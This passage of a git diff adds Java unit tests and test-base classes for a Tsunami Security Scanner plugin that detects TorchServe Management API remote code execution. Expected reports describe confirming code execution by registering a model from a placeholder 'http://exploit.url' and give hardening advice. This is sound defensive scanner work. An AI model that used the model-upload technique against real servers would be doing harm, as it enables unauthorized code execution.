- Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + @Test + public void detect_whenTorchServiceIsVulnerableWithLocalMode_reportsVulnerability() + throws IOException { + exploiter.details.exploitationMode = TorchServeExploiter.ExploitationMode.LOCAL; + exploiter.details.models = ImmutableList.of(); + exploiter.details.hashVerification = true; + exploiter.details.modelName = "test_model"; + exploiter.details.exploitUrl = "http://exploit.url"; + exploiter.details.systemInfo = "{\"os\": \"Linux\"}"; + exploiter.details.messageLogged = + "Tsunami TorchServe Plugin: Detected and executed. Refer to Tsunami Security Scanner repo" + + " for details. No malicious activity intended. Timestamp: "; + + assertThat(getDetectionReports().get(0).toString()) + .isEqualTo( + DetectionReport.newBuilder() + .setTargetInfo(TargetInfo.getDefaultInstance()) + .setNetworkService(NetworkService.getDefaultInstance()) + .setDetectionTimestamp(Timestamps.fromMillis(fakeUtcClock.millis())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("DOYENSEC") + .setValue("TORCHSERVE_MANAGEMENT_API_RCE")) + .setSeverity(Severity.CRITICAL) + .setTitle("TorchServe Management API Remote Code Execution") + .setDescription( + "An exposed TorchServe management API was detected on the target." + + " TorchServe is a model server for PyTorch models. The management" + + " API allows adding new models to the server which by design can" + + " be used to execute arbitrary code on the target.\n" + + "This exposure poses a significant security risk as it could" + + " allow unauthorized users to run arbitrary code on the" + + " server.The exploit was confirmed by adding a new model to the" + + " target with the following details: - Name: test_model - URL:" + + " http://exploit.url") + .setRecommendation( + "It is strongly recommended to restrict access to the TorchServe" + + " Management API, as public exposure poses significant security" + + " risks. The API allows potentially disruptive interactions with" + + " TorchServe, including modifying configurations, deleting" + + " models, and altering resource allocation, which could lead to" + + " Denial of Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of" + + " unauthorized code execution through model uploads. Users must" + + " ensure strict control over model creation to prevent" + + " unauthorized or malicious use. Implementing the" + + " \'allowed_urls\' option in TorchServe\'s configuration is" + + " critical in this regard. This setting, detailed at" + + " https://pytorch.org/serve/configuration.html#:~:text=allowed_urls," + + " limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure \'allowed_urls\' as a" + + " comma-separated list of regular expressions that specifically" + + " allow only trusted sources. General whitelisting of large" + + " domains (such as entire AWS S3 or GCP buckets) is not secure." + + " Care must be taken to ensure regex patterns are accurately" + + " defined (e.g., using \'https://models\\.my-domain\\.com/*\'" + + " instead of \'https://models.my-domain.com/*\' to prevent" + + " unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original" + + " URLs of downloaded models. Attackers could exploit this" + + " information to identify vulnerable download sources or to host" + + " malicious models on similarly-named domains.") + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder() + .setText( + "Code execution was verified by adding a new model to" + + " the target and performing following actions:\n" + + " - Calculating a hash of a random value and" + + " comparing it to the value returned by the" + + " target (Success)\n" + + "System info collected from the target:\n" + + "{\n" + + " \"os\": \"Linux\"\n" + + "}\n\n" + + "The following log entry was generated on the" + + " target:\n\n" + + "Tsunami TorchServe Plugin: Detected and" + + " executed. Refer to Tsunami Security Scanner" + + " repo for details. No malicious activity" + + " intended. Timestamp: ") + .build()) + .build()) + .build()) + .toString()); + } + + private List getDetectionReports() { + return detector + .detect( + TargetInfo.getDefaultInstance(), ImmutableList.of(NetworkService.getDefaultInstance())) + .getDetectionReportsList(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java new file mode 100644 index 000000000..4b8eca457 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java @@ -0,0 +1,101 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.inject.AbstractModule; +import com.google.inject.Guice; +import com.google.inject.Injector; +import com.google.inject.Module; +import com.google.inject.name.Named; +import com.google.inject.name.Names; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import java.io.IOException; +import java.time.Instant; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; +import org.junit.Before; + +public abstract class TorchServeManagementApiTestBase { + @Inject + @Named("target") + protected MockWebServer mockTorchServe; + + protected final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + // These should be defined in the subclass as needed + // @Inject + // protected TorchServeManagementApiDetector detector; + + // @Inject + // protected TorchServeExploiter exploiter; + + private static class CustomTestModule extends AbstractModule { + private FakeUtcClock fakeUtcClock; + + CustomTestModule(FakeUtcClock fakeUtcClock) { + this.fakeUtcClock = fakeUtcClock; + } + + @Override + protected void configure() { + // Guice modules provide by Tsunami + install(new HttpClientModule.Builder().build()); + install(new FakeUtcClockModule(fakeUtcClock)); + + bind(MockWebServer.class) + .annotatedWith(Names.named("target")) + .toInstance(new MockWebServer()); + + FakePayloadGeneratorModule fakePayloadGeneratorModule = + FakePayloadGeneratorModule.builder().build(); + install(fakePayloadGeneratorModule); + + // Our detector and exploiter + bind(TorchServeRandomUtils.class).to(MockTorchServeRandomUtils.class); + bind(TorchServeManagementApiDetector.class); + bind(TorchServeExploiter.class); + bind(TorchServeManagementAPIExploiterWebServer.class) + .to(MockTorchServeManagementApiExploiterWebServer.class); + } + } + + protected Module getBaseModule() { + return new CustomTestModule(fakeUtcClock); + } + + // Override this in subclasses for custom setup + protected void onTestExecution() throws IOException { + // Do nothing + } + + @Before + public void setUp() throws IOException { + Injector baseInjector = Guice.createInjector(getBaseModule()); + baseInjector.injectMembers(this); + // this.mockTorchServe.start(); + onTestExecution(); + } + + @After + public void tearDown() throws IOException { + // this.mockTorchServe.shutdown(); + } +} diff --git a/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java new file mode 100644 index 000000000..769f50ecc --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java @@ -0,0 +1,72 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.inject.AbstractModule; +import com.google.inject.Module; +import com.google.inject.name.Named; +import com.google.inject.name.Names; +import com.google.inject.util.Modules; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import java.io.IOException; +import java.security.SecureRandom; +import java.util.Arrays; +import javax.inject.Inject; +import okhttp3.mockwebserver.MockWebServer; +import org.junit.After; + +public abstract class TorchServeManagementApiTestBaseWithCallbackServer + extends TorchServeManagementApiTestBase { + @Inject + @Named("callback") + protected MockWebServer mockCallbackServer; + + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + + @Override + protected Module getBaseModule() { + Module baseModule = super.getBaseModule(); + Module callbackModule = + new AbstractModule() { + @Override + protected void configure() { + MockWebServer mockCallbackServerInstance = new MockWebServer(); + FakePayloadGeneratorModule fakePayloadGeneratorModule = + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServerInstance) + .setSecureRng(testSecureRandom) + .build(); + install(fakePayloadGeneratorModule); + bind(MockWebServer.class) + .annotatedWith(Names.named("callback")) + .toInstance(mockCallbackServerInstance); + } + }; + return Modules.override(baseModule).with(callbackModule); + } + + @After + public void tearDown() throws IOException { + super.tearDown(); + this.mockCallbackServer.shutdown(); + } +}